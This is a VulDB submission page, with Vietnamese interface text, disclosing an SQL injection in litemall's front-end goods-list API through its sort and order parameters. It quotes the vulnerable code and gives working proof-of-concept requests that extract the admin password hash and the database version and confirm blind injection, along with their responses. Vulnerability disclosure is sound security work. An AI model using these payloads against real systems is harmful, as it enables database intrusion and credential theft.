Gửi #811467: linlinjava litemall up to 1.8.0 SQL Injectionthông tin

tiêu đềlinlinjava litemall up to 1.8.0 SQL Injection
Mô tảA critical vulnerability was found in linlinjava litemall (https://github.com/linlinjava/litemall)up to 1.8.0. This vulnerability affects the list function of WxGoodsController.java in the front-end WeChat API. The manipulation of the argument sort/order leads to SQL injection. IMPORTANT: Unlike previously reported CVEs (CVE-2024-24323, CVE-2024-46382) which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list) which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2). Vulnerable code in WxGoodsController.java: @GetMapping("list") public Object list(@RequestParam(defaultValue="add_time") String sort, @RequestParam(defaultValue="desc") String order, ...) LitemallGoodsService.java line 121-122: if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) { example.setOrderByClause(sort + " " + order); } MyBatis: order by ${orderByClause} No @Sort whitelist annotation is applied to WxGoodsController. PoC 1 - Extract admin password hash from FRONT-END (no admin auth required): GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10 Response error: XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ' Admin bcrypt hash leaked from front-end API! PoC 2 - Extract MySQL version: GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc Response error: XPATH syntax error: '~8.0.45~' PoC 3 - Boolean-based blind: GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc -> sorted by id GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc -> sorted by name Different order confirms injection. Comparison: CVE-2024-24323/CVE-2024-46382 require admin Shiro session. THIS vulnerability requires only regular user auth or no auth at all. Reporter: berna ([email protected])
Nguồn⚠️ https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512
Người dùng
 berna (UID 97558)
Đệ trình23/04/2026 16:38 (cách đây 1 tháng)
Kiểm duyệt17/05/2026 11:36 (24 days later)
Trạng tháiđược chấp nhận
Mục VulDB364396 [linlinjava litemall đến 1.8.0 Front-end WeChat API WxGoodsController.java list Tiêm SQL]
điểm20

TrướcTổng QuanTiếp theo

Do you need the next level of professionalism?

Upgrade your account now!